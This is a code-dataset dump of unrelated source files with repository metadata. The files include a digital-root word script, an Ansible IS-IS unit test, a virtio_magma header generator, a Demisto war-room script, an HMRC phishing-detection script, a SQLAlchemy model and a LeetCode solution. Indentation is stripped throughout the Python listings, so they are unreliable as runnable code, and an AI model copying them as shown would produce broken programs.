460aca28cb6d411fddd39c6c989a987cee662dcd
| 3,921 |
py
|
Python
|
src/scripts/alchi-wordsum.py
|
milahu/alchi
|
6484d4a877d47204e28cf1a32a5d9da8705aff25
|
[
"CC0-1.0"
] | 3 |
2020-08-12T16:57:23.000Z
|
2021-03-15T18:39:48.000Z
|
src/scripts/alchi-wordsum.py
|
milahu/alchi
|
6484d4a877d47204e28cf1a32a5d9da8705aff25
|
[
"CC0-1.0"
] | 4 |
2020-09-22T19:25:43.000Z
|
2022-02-14T20:51:16.000Z
|
src/scripts/alchi-wordsum.py
|
milahu/alchi
|
6484d4a877d47204e28cf1a32a5d9da8705aff25
|
[
"CC0-1.0"
] | 1 |
2021-04-06T11:18:17.000Z
|
2021-04-06T11:18:17.000Z
|
#!/usr/bin/python3
# https://en.wikipedia.org/wiki/Digital_root
# digital sum
"""
wordlist samples:
https://github.com/hackerb9/gwordlist
All the words from Google Books, sorted by frequency
https://github.com/first20hours/google-10000-english
the 10,000 most common English words in order of frequency
https://github.com/metabase/metabase/raw/master/resources/words-by-frequency.txt
"""
n0 = ord('a') # a = 0
n1 = ord('a') - 1 # a = 1
import sys
from bs4 import UnicodeDammit # pkg: python-beautifulsoup4
#import unicodedata
from unidecode import unidecode # pkg: python-unidecode
def _print(s):
sys.stdout.write(s)
def _toword(s):
res0 = ''
res1 = ''
for c in s:
#try:
if True:
if '0' <= c and c <= '9':
res0 += chr(int(c) + n0)
res1 += chr(int(c) + n1)
#except TypeError:
if False:
c = str(c)
if '0' <= c and c <= '9':
res0 += chr(int(c) + n0)
res1 += chr(int(c) + n1)
return (res0, res1)
def digroot(n):
res = []
while len(str(n)) > 1:
n2 = 0
for c in str(n):
n2 += int(c)
res.append(n2)
n = n2
return res
def wordsum(w):
n = 0
sum0 = []
sum1 = []
#print('w = ' + repr(w))
for c in w:
#print('c = ' + repr(c))
if '0' <= c and c <= '9':
sum0.append(int(c))
sum1.append(int(c))
continue
if 'a' <= c and c <= 'z':
sum0.append(ord(c) - n0)
sum1.append(ord(c) - n1)
continue
if 'A' <= c and c <= 'Z':
sum0.append(ord(c.lower()) - n0)
sum1.append(ord(c.lower()) - n1)
continue
# ignore other signs
#print(n)
drs = []
ns = []
ss = []
for (i, s) in enumerate([sum0, sum1]):
ss.append(s)
n = sum(s)
ns.append(n)
# _print('n%i = ' % i + ' + '.join(map('{:2d}'.format, s)) + ' = ' + str(n))
dr = digroot(n)
if dr:
# _print(' --> ' + ' --> '.join(map(str, dr)))
drs.append(dr)
else:
drs.append([s])
# print() # new line
#for x in drs:
# if x[0] == 187:
# print('s0 = %3i s1 = %3i %s' % (ns[0], ns[1], w))
# only print words with 'digital root seven' in both variants
if drs[0][-1] == 7:
are_same = True
for x in drs[1:]:
if x[-1] != drs[0][-1]:
are_same = False
break
if are_same:
# print('we have a winner')
# print('word = %s' % w)
# print('%-24s s0 = %3i s1 = %3i' % (w, ns[0], ns[1]))
# print('s0 = %3i s1 = %3i %s' % (ns[0], ns[1], w))
# print("%03i° %03i' %s" % (ns[0], ns[1], w))
# print("%03i %03i %s" % (ns[0], ns[1], w))
print("%s %03i %03i" % (w, ns[0], ns[1]))
# for (i, dr) in enumerate(drs):
# _print('n%i = ' % i + ' + '.join(map('{:2d}'.format, ss[i])) + ' = ' + str(ns[i]))
# print(' --> ' + ' --> '.join(map(str, dr)))
import os.path
for w in sys.argv[1:]:
#print('toword: ' + 'a=0: %s a=1: %s' % _toword(w))
#print('word = %s' % w)
wordsum(w)
# process wordlist file
if os.path.isfile(w):
c = None
with open(w, 'rb') as f:
#if False:
# guess encoding
f.seek(10000)
s = f.read(10000)
d = UnicodeDammit(
s,
#f.read(10000),
["latin-1", "iso-8859-1", "cp1252"] # coding hints
)
c = d.original_encoding
print('guess coding '+c)
#f.seek(0)
c = 'utf-8'
with open(w, 'r', encoding=c, errors='ignore') as f:
#with open(w, 'r') as f:
for l in f: # line by line
if w == 'words/gwordlist-frequency-all.txt':
if l[0] == '#':
continue
l = l[11:32] # word
#l = l.decode(c).encode('utf-8')
#print('line = '+l)
#break
# guess input file encoding with beautifulsoup
#l = UnicodeDammit.detwingle(l).decode('utf-8')
l = l.strip()
l = l.replace('ß', 's') # otherwise unidecode will replace 'ß' to 'ss'
l = unidecode(l)
#l = unicodedata.normalize('NFKD', l).encode('ascii', 'ignore').decode('utf-8')
#l = unicodedata.normalize('NFKD', l)
try:
if l[0] in ['-', '#', '!']:
l = l[1:]
if l[-1] in ['-', '#', '!', '0']:
l = l[:-1]
except IndexError:
pass
wordsum(l)
| 21.783333 | 87 | 0.534813 |
e80282abb33e183dd140910cd0a5955cd66b26fc
| 10,762 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_view.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_view.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_view.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# (c) 2019 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.cloudengine import ce_is_is_view
from ansible_collections.community.general.tests.unit.modules.network.cloudengine.ce_module import TestCloudEngineModule, load_fixture
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
class TestCloudEngineLacpModule(TestCloudEngineModule):
module = ce_is_is_view
def setUp(self):
super(TestCloudEngineLacpModule, self).setUp()
self.mock_get_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_view.get_nc_config')
self.get_nc_config = self.mock_get_config.start()
self.mock_set_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_view.set_nc_config')
self.set_nc_config = self.mock_set_config.start()
self.set_nc_config.return_value = None
self.before = load_fixture('ce_is_is_view', 'before.txt')
self.after = load_fixture('ce_is_is_view', 'after.txt')
def tearDown(self):
super(TestCloudEngineLacpModule, self).tearDown()
self.mock_set_config.stop()
self.mock_get_config.stop()
def test_ce_is_is_view_absent(self):
self.get_nc_config.side_effect = (self.after, self.before)
config = dict(
instance_id=100,
description='ISIS',
islevel='level_1',
coststyle='narrow',
stdlevel2cost=60,
stdbandwidth=100,
autocostenable=True,
autocostenablecompatible=True,
netentity='netentity',
preference_value=100,
route_policy_name='route',
max_load=32,
ip_address='1.1.1.1',
weight=100,
penetration_direct='level2-level1',
import_routepolicy_name='import',
tag=100,
allow_filter=True,
allow_up_down=True,
enablelevel1tolevel2=True,
defaultmode='always',
mode_routepolicyname='mode',
cost=100,
mode_tag=100,
level_type='level_1',
avoid_learning=True,
protocol='ospf',
processid=100,
cost_type='external',
import_cost=100,
import_tag=100,
import_route_policy='import',
impotr_leveltype='level_1',
inheritcost=True,
permitibgp=True,
export_protocol='ospf',
export_policytype='aclNumOrName',
export_processid=100,
export_ipprefix='export',
export_routepolicyname='export',
import_aclnumorname='acl',
import_routepolicyname='import',
bfd_min_rx=100,
bfd_min_tx=100,
bfd_multiplier_num=10,
state='absent'
)
set_module_args(config)
self.execute_module(changed=True)
def test_ce_is_is_view_present(self):
self.get_nc_config.side_effect = (self.before, self.after)
update = ['isis 100',
'description ISIS',
'is-level level_1',
'cost-style narrow',
'circuit-cost 60 level-2',
'bandwidth-reference 100',
'network-entity netentity',
'preference 100 route-policy route',
'maximum load-balancing 32',
'nexthop 1.1.1.1 weight 100',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'undo import-route isis level-1 into level-2 disable',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'bfd all-interfaces enable',
'bfd all-interfaces min-rx-interval 100 min-tx-interval 100 detect-multiplier 10',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'filter-policy ip-prefix export route-policy export export ospf 100',
'bfd all-interfaces min-rx-interval 100 min-tx-interval 100 detect-multiplier 10',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'filter-policy acl-name acl route-policy importimport',
'filter-policy ip-prefix export route-policy export export ospf 100',
'bfd all-interfaces min-rx-interval 100 min-tx-interval 100 detect-multiplier 10',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'auto-cost enable',
'auto-cost enable compatible']
config = dict(
instance_id=100,
description='ISIS',
islevel='level_1',
coststyle='narrow',
stdlevel2cost=60,
stdbandwidth=100,
autocostenable=True,
autocostenablecompatible=True,
netentity='netentity',
preference_value=100,
route_policy_name='route',
max_load=32,
ip_address='1.1.1.1',
weight=100,
penetration_direct='level2-level1',
import_routepolicy_name='import',
tag=100,
allow_filter=True,
allow_up_down=True,
enablelevel1tolevel2=True,
defaultmode='always',
mode_routepolicyname='mode',
cost=100,
mode_tag=100,
level_type='level_1',
avoid_learning=True,
protocol='ospf',
processid=100,
cost_type='external',
import_cost=100,
import_tag=100,
import_route_policy='import',
impotr_leveltype='level_1',
inheritcost=True,
permitibgp=True,
export_protocol='ospf',
export_policytype='aclNumOrName',
export_processid=100,
export_ipprefix='export',
export_routepolicyname='export',
import_aclnumorname='acl',
import_routepolicyname='import',
bfd_min_rx=100,
bfd_min_tx=100,
bfd_multiplier_num=10
)
set_module_args(config)
result = self.execute_module(changed=True)
self.assertEquals(sorted(result['updates']), sorted(update))
def test_ce_is_is_view_no_changed(self):
self.get_nc_config.side_effect = (self.after, self.after)
config = dict(
instance_id=100,
description='ISIS',
islevel='level_1',
coststyle='narrow',
stdlevel2cost=60,
stdbandwidth=100,
autocostenable=True,
autocostenablecompatible=True,
netentity='netentity',
preference_value=100,
route_policy_name='route',
max_load=32,
ip_address='1.1.1.1',
weight=100,
penetration_direct='level2-level1',
import_routepolicy_name='import',
tag=100,
allow_filter=True,
allow_up_down=True,
enablelevel1tolevel2=True,
defaultmode='always',
mode_routepolicyname='mode',
cost=100,
mode_tag=100,
level_type='level_1',
avoid_learning=True,
protocol='ospf',
processid=100,
cost_type='external',
import_cost=100,
import_tag=100,
import_route_policy='import',
impotr_leveltype='level_1',
inheritcost=True,
permitibgp=True,
export_protocol='ospf',
export_policytype='aclNumOrName',
export_processid=100,
export_ipprefix='export',
export_routepolicyname='export',
import_aclnumorname='acl',
import_routepolicyname='import',
bfd_min_rx=100,
bfd_min_tx=100,
bfd_multiplier_num=10
)
set_module_args(config)
self.execute_module(changed=False)
| 43.220884 | 146 | 0.610481 |
e803a1701a74ac959fddab953c76411b42a0f00d
| 8,626 |
py
|
Python
|
garnet/lib/magma/include/virtio/virtio_magma.h.gen.py
|
opensource-assist/fuschia
|
66646c55b3d0b36aae90a4b6706b87f1a6261935
|
[
"BSD-3-Clause"
] | 3 |
2020-08-02T04:46:18.000Z
|
2020-08-07T10:10:53.000Z
|
garnet/lib/magma/include/virtio/virtio_magma.h.gen.py
|
opensource-assist/fuschia
|
66646c55b3d0b36aae90a4b6706b87f1a6261935
|
[
"BSD-3-Clause"
] | null | null | null |
garnet/lib/magma/include/virtio/virtio_magma.h.gen.py
|
opensource-assist/fuschia
|
66646c55b3d0b36aae90a4b6706b87f1a6261935
|
[
"BSD-3-Clause"
] | 1 |
2020-08-07T10:11:49.000Z
|
2020-08-07T10:11:49.000Z
|
#!/usr/bin/env python2.7
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import sys
def usage():
print 'Usage:'
print ' virtio_magma.h.gen.py FORMAT INPUT OUTPUT'
print ' FORMAT either \"fuchsia\" or \"linux\"'
print ' INPUT json file containing the magma interface definition'
print ' OUTPUT destination path for the virtio header file to generate'
print ' Example: ./virtio_magma.h.gen.py fuchsia ../magma_abi/magma.json ./virtio_magma.h'
print ' Generates the virtio magma header based on a provided json definition,'
print ' for either fuchsia or the linux kernel.'
# Generates a c or cpp style comment
def comment(lines, cpp):
ret = ('// ' if cpp else '/* ') + lines[0] + '\n'
for line in lines[1:]:
ret += ('// ' if cpp else ' ') + line + '\n'
if not cpp:
ret = ret[:-1] + ' */\n'
return ret
# Wire formats for various widths
def wire_format_from_width(width):
global fuchsia
global tab
format_fuchsia = {
1: 'uint8_t',
2: 'uint16_t',
4: 'uint32_t',
8: 'uint64_t',
}
format_linux = {
1: 'u8',
2: '__le16',
4: '__le32',
8: '__le64',
}
invalid = 'INVALID TYPE WIDTH'
if fuchsia:
return format_fuchsia.get(width, invalid)
return format_linux.get(width, invalid)
# Wire format for a given type
def wire_format(type):
# Default to 8 bytes
width = 8
if type.find('*') != -1: width = 8
if type == 'uint32_t': width = 4
if type == 'int32_t': width = 4
if type == 'magma_bool_t': width = 1
return wire_format_from_width(width)
# License string for the top of the file.
def license():
global fuchsia
lines = [
'Copyright 2018 The Fuchsia Authors. All rights reserved.',
'Use of this source code is governed by a BSD-style license that can be',
'found in the LICENSE file.'
]
return comment(lines, fuchsia)
# Warning string about auto-generation
def warning():
global fuchsia
lines = [
'NOTE: DO NOT EDIT THIS FILE! It is generated automatically by:',
' //garnet/lib/magma/include/virtio/virtio_magma.h.gen.py'
]
return comment(lines, fuchsia)
# Guard macro that goes at the beginning/end of the header (after license).
def guards(begin):
global fuchsia
global tab
macro = '_LINUX_VIRTIO_MAGMA_H'
if fuchsia:
macro = 'GARNET_LIB_MAGMA_INCLUDE_VIRTIO_VIRTIO_MAGMA_H_'
if begin:
return '#ifndef ' + macro + '\n#define ' + macro + '\n'
return '#endif ' + comment([macro], fuchsia)
# Includes lists.
def includes():
ret = ''
if fuchsia:
ret += '#include <stdint.h>\n'
ret += '#include <zircon/compiler.h>\n'
else:
ret += '#include <linux/virtio_ids.h>\n'
ret += '#include <linux/virtio_config.h>\n'
ret += '#include <linux/virtmagma.h>\n'
return ret
# Extract the non-"magma_" portion of the name of an export
def get_name(export):
return export['name'][len('magma_'):]
# Generate a 4-digit hex string for a given integer, checking against collisions
def format_id(id, used):
ret = '0x{:04X}'.format(id)
if (id > len(used) or used[id]):
raise Exception('Command ID collision: ' + ret)
used[id] = True
return ret
# Generate enum
def gen_enums(magma):
global fuchsia
global tab
commands = tab + comment(['magma commands'], fuchsia)
responses = tab + comment(['magma success responses'], fuchsia)
errors = tab + comment(['magma error responses'], fuchsia)
string_table = 'inline const char* virtio_magma_ctrl_type_string(enum virtio_magma_ctrl_type type) {\n'
string_table += tab + 'switch (type) {\n'
expected_response_table = 'inline enum virtio_magma_ctrl_type virtio_magma_expected_response_type(enum virtio_magma_ctrl_type type) {\n'
expected_response_table += tab + 'switch (type) {\n'
command_id_base = 0x1000
response_id_base = 0x2000
error_id_base = 0x3000
max_id_count = 0x4000
used = [False] * max_id_count
for export in magma['exports']:
name = get_name(export).upper()
ordinal = export['ordinal']
assert ordinal < magma['next-free-ordinal']
command_id = command_id_base + ordinal
response_id = response_id_base + ordinal
commands += tab + 'VIRTIO_MAGMA_CMD_' + name + ' = ' + format_id(command_id, used) + ',\n'
responses += tab + 'VIRTIO_MAGMA_RESP_' + name + ' = ' + format_id(response_id, used) + ',\n'
command_id = response_id = ''
string_table += tab + tab + 'case VIRTIO_MAGMA_CMD_' + name + ': return "VIRTIO_MAGMA_CMD_' + name + '";\n'
string_table += tab + tab + 'case VIRTIO_MAGMA_RESP_' + name + ': return "VIRTIO_MAGMA_RESP_' + name + '";\n'
expected_response_table += tab + tab + 'case VIRTIO_MAGMA_CMD_' + name + ': return VIRTIO_MAGMA_RESP_' + name + ';\n'
error_names = [
'VIRTIO_MAGMA_RESP_ERR_UNIMPLEMENTED',
'VIRTIO_MAGMA_RESP_ERR_INTERNAL',
'VIRTIO_MAGMA_RESP_ERR_HOST_DISCONNECTED',
'VIRTIO_MAGMA_RESP_ERR_OUT_OF_MEMORY',
'VIRTIO_MAGMA_RESP_ERR_INVALID_COMMAND',
'VIRTIO_MAGMA_RESP_ERR_INVALID_ARGUMENT'
]
error_id = error_id_base + 1
for error_name in error_names:
errors += tab + error_name + ' = ' + format_id(error_id, used) + ',\n'
string_table += tab + tab + 'case ' + error_name + ': return "' + error_name + '";\n'
error_id = error_id + 1
string_table += tab + tab + 'default: return "[invalid virtio_magma_ctrl_type]";\n'
string_table += tab + '}\n'
string_table += '}\n'
expected_response_table += tab + tab + 'default: return VIRTIO_MAGMA_RESP_ERR_INVALID_COMMAND;\n'
expected_response_table += tab + '}\n'
expected_response_table += '}\n'
ret = 'enum virtio_magma_ctrl_type {\n'
ret += commands
ret += responses
ret += errors
if fuchsia:
ret += '} __PACKED;\n\n'
else:
ret += '} __attribute((packed));\n\n'
ret += string_table + '\n'
ret += expected_response_table
return ret
# Format command or response struct for an export
def format_struct(export, ctrl):
global fuchsia
global tab
name = 'virtio_magma_' + get_name(export) + '_' + ('ctrl' if ctrl else 'resp')
ret = ''
if fuchsia:
ret += 'typedef '
ret += 'struct ' + name + ' {\n'
if fuchsia:
ret += tab + 'virtio_magma_ctrl_hdr_t hdr;\n'
else:
ret += tab + 'struct virtio_magma_ctrl_hdr hdr;\n'
for argument in export['arguments']:
# Include this argument iff out and resp or !out and ctrl
use = False
if argument['name'].find('_out') == -1:
if ctrl:
use = True
else:
if not ctrl:
use = True
if use:
ret += tab + wire_format(argument['type']) + ' ' + argument['name'] + ';\n'
# Add return value, if any
if not ctrl:
if export['type'] != 'void':
ret += tab + wire_format(export['type']) + ' result_return;\n'
if fuchsia:
ret += '} __PACKED ' + name + '_t;\n'
else:
ret += '} __attribute((packed));\n'
return ret
def config_type():
global fuchsia
global tab
ret = ''
if fuchsia:
ret += 'typedef '
ret += 'struct virtio_magma_config {\n'
ret += tab + wire_format('uint8_t') + ' dummy;\n'
if fuchsia:
ret += '} __PACKED virtio_magma_config_t;\n'
else:
ret += '} __attribute((packed));\n'
return ret
# Common control header struct
def ctrl_hdr():
global fuchsia
global tab
ret = ''
if fuchsia:
ret += 'typedef '
ret += 'struct virtio_magma_ctrl_hdr {\n'
ret += tab + wire_format('uint32_t') + ' type;\n'
ret += tab + wire_format('uint32_t') + ' flags;\n'
if fuchsia:
ret += '} __PACKED virtio_magma_ctrl_hdr_t;\n'
else:
ret += '} __attribute((packed));\n'
return ret
fuchsia = True
tab = ' '
def main():
global fuchsia
global tab
if (len(sys.argv) != 4):
usage()
exit(-1)
if (sys.argv[1] == 'linux'):
fuchsia = False
tab = '\t'
elif (sys.argv[1] != 'fuchsia'):
usage()
exit(-2)
with open(sys.argv[2], 'r') as file:
with open(sys.argv[3], 'w') as dest:
magma = json.load(file)['magma-interface']
header = license() + '\n'
header += warning() + '\n'
header += guards(True) + '\n'
header += includes() + '\n'
if fuchsia:
header += '__BEGIN_CDECLS\n\n'
header += config_type() + '\n'
header += gen_enums(magma) + '\n'
header += ctrl_hdr() + '\n'
for export in magma['exports']:
header += format_struct(export, True) + '\n'
header += format_struct(export, False) + '\n'
if fuchsia:
header += '__END_CDECLS\n\n'
header += guards(False)
dest.write(header)
if __name__ == '__main__':
sys.exit(main())
| 31.713235 | 138 | 0.643751 |
1c977454d64119f3c5ea9748743df7399c05fc55
| 790 |
py
|
Python
|
Packs/DynamicSectionReports/Scripts/DisplayTaggedWarroomEntries/DisplayTaggedWarroomEntries.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/DynamicSectionReports/Scripts/DisplayTaggedWarroomEntries/DisplayTaggedWarroomEntries.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/DynamicSectionReports/Scripts/DisplayTaggedWarroomEntries/DisplayTaggedWarroomEntries.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import json
filter_arg = json.loads(demisto.args().get("filter", json.dumps({"tags": ["report"]})))
raw_entries = None
if filter_arg:
raw_entries = demisto.executeCommand('getEntries', {"id": demisto.incident().get("id"), "filter": filter_arg})
if raw_entries:
entries = []
for entry in raw_entries:
entries.append(str(entry["Contents"]))
else:
entries = ["No entries tagged with 'report' tag"]
# demisto.results(str(entries))
result = {
'Type': entryTypes["note"],
'Contents': "\n".join(entries),
'ContentsFormat': formats['markdown'],
'HumanReadable': "\n".join(entries),
'ReadableContentsFormat': formats['markdown']
}
demisto.results(result)
| 24.6875 | 114 | 0.674684 |
98eb4253442de3e6966845ff86d489085844b0fa
| 1,613 |
py
|
Python
|
common/models/member/MemberAddress.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | 2 |
2019-06-10T08:57:47.000Z
|
2021-06-12T16:22:15.000Z
|
common/models/member/MemberAddress.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
common/models/member/MemberAddress.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from sqlalchemy import Column, DateTime, Index, Integer, String
from sqlalchemy.schema import FetchedValue
from application import db
class MemberAddress(db.Model):
__tablename__ = 'member_address'
__table_args__ = (
db.Index('idx_member_id_status', 'member_id', 'status'),
)
id = db.Column(db.Integer, primary_key=True)
member_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
nickname = db.Column(db.String(20), nullable=False, server_default=db.FetchedValue())
mobile = db.Column(db.String(11), nullable=False, server_default=db.FetchedValue())
province_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
province_str = db.Column(db.String(50), nullable=False, server_default=db.FetchedValue())
city_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
city_str = db.Column(db.String(50), nullable=False, server_default=db.FetchedValue())
area_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
area_str = db.Column(db.String(50), nullable=False, server_default=db.FetchedValue())
address = db.Column(db.String(100), nullable=False, server_default=db.FetchedValue())
status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
is_default = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
updated_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
created_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
| 59.740741 | 93 | 0.749535 |
c734ebd6178f9f1c535610ca3b18a21d57d45c9a
| 1,675 |
py
|
Python
|
Packs/SlashNextPhishingIncidentResponse/Scripts/BrandImpersonationDetection/BrandImpersonationDetection.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/SlashNextPhishingIncidentResponse/Scripts/BrandImpersonationDetection/BrandImpersonationDetection.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/SlashNextPhishingIncidentResponse/Scripts/BrandImpersonationDetection/BrandImpersonationDetection.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import re
import demistomock as demisto
from CommonServerPython import * # noqa: F401
# Scipt result
res = False
# Mandatory arguments
file_entry_ids = demisto.args()["ForensicFileEntry"]
forensic_files = file_entry_ids if isinstance(file_entry_ids, list) else file_entry_ids.split(",")
try:
for entry in forensic_files:
files_info = demisto.getFilePath(id=entry)
with open(files_info["path"], "r") as file_handle:
file_content = file_handle.read()
result = re.findall('hm rеvеnuе & custоms', file_content, re.IGNORECASE)
if len(result):
res = True
result = re.findall('GOV.UK', file_content)
if len(result):
res = True
result1 = re.findall('hmrc', file_content, re.IGNORECASE)
result2 = re.findall('gov.uk', file_content, re.IGNORECASE)
if len(result1) and len(result2):
res = True
result1 = re.findall('tax refund', file_content, re.IGNORECASE)
result2 = re.findall('gov.uk', file_content, re.IGNORECASE)
if len(result1) and len(result2):
res = True
ec = {
"SlashNext.PhishingBrand": "HMRC" if res else "Unknown"
}
ioc_cont = {
"PhishingBrand": "HMRC" if res else "Unknown"
}
md = tableToMarkdown(
"HMRC Targeted Phishing Detection",
ioc_cont,
['PhishingBrand']
)
return_outputs(md, ec, ioc_cont)
except Exception as ex:
return_error("Exception Occurred, {}".format(str(ex)))
| 31.018519 | 98 | 0.574328 |
c7b2d5a4fb3eac88a3d26a6c4c9aa5329f14e65d
| 587 |
py
|
Python
|
leetcode/112-Path-Sum/PathSum_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/112-Path-Sum/PathSum_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/112-Path-Sum/PathSum_001.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @param sum, an integer
# @return a boolean
def hasPathSum(self, root, sum):
if root == None:
return False
diff = sum - root.val
if root.left == None and root.right == None and diff == 0:
return True
a = self.hasPathSum(root.left, diff)
b = self.hasPathSum(root.right, diff)
return a or b
| 24.458333 | 66 | 0.551959 |
401bcd08aa8968731ba6ff0041f2bfe2a3b6f581
| 477 |
py
|
Python
|
source/pkgsrc/cad/py-gds/patches/patch-setup.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/cad/py-gds/patches/patch-setup.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/cad/py-gds/patches/patch-setup.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-setup.py,v 1.2 2020/09/04 16:05:20 mef Exp $
Allow UTF-8 README.md
--- setup.py.orig 2020-05-31 17:53:41.141364832 +0000
+++ setup.py
@@ -12,7 +12,7 @@ import platform
from setuptools import setup, Extension
from distutils.version import LooseVersion
-with open("README.md") as fin:
+with open("README.md", **({'encoding': 'UTF-8'} if sys.version_info.major>=3 else {})) as fin:
long_description = fin.read()
with open("gdspy/__init__.py") as fin:
| 29.8125 | 95 | 0.685535 |
4041c83bb1c3ed61078627345783ddb3a731bfaf
| 3,032 |
py
|
Python
|
test3.py
|
Tiangewang0524/zzu_spider
|
eddd534f6a7bfb39eec5a7e240f830550b2285cb
|
[
"Apache-2.0"
] | null | null | null |
test3.py
|
Tiangewang0524/zzu_spider
|
eddd534f6a7bfb39eec5a7e240f830550b2285cb
|
[
"Apache-2.0"
] | null | null | null |
test3.py
|
Tiangewang0524/zzu_spider
|
eddd534f6a7bfb39eec5a7e240f830550b2285cb
|
[
"Apache-2.0"
] | null | null | null |
import requests
